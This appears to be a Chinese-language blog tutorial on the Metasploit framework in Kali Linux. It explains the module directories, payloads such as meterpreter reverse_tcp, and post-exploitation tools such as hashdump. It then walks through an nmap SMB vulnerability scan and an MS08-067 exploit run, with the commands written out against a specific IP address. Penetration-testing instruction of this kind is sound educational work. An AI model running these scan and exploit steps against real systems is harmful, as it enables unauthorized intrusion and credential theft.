kali 漏洞利用metasploit
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。
1.启动服务:
在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录
2.路径介绍
kali中,msf的路径为/usr/share/metasploit-framework
比如modules中,是我们在msf中经常会利用到的一些工具
auxiliary:辅助模块
encoders:供msfencode编码工具使用,具体可使用msfencode -l
exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。
payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。
post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。
3.基本命令
msfpayload:用来生成payload或者shellcode
搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。
-o 选项可以列出payload所需的参数
msfencode:
msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)
msfconsole:
开启metasploit的console
4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令
nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22
- 1
- 1
可以看到,其中含有漏洞MS08-067
在console中搜索一下,可以看到下面的界面
然后就use其中一个版本
use exploit/windows/smb/ms08_067_netapi
- 1
- 1
查看一些参数
可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置
set RHOST 222.28.136.22
- 1
- 1
选择payload
设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell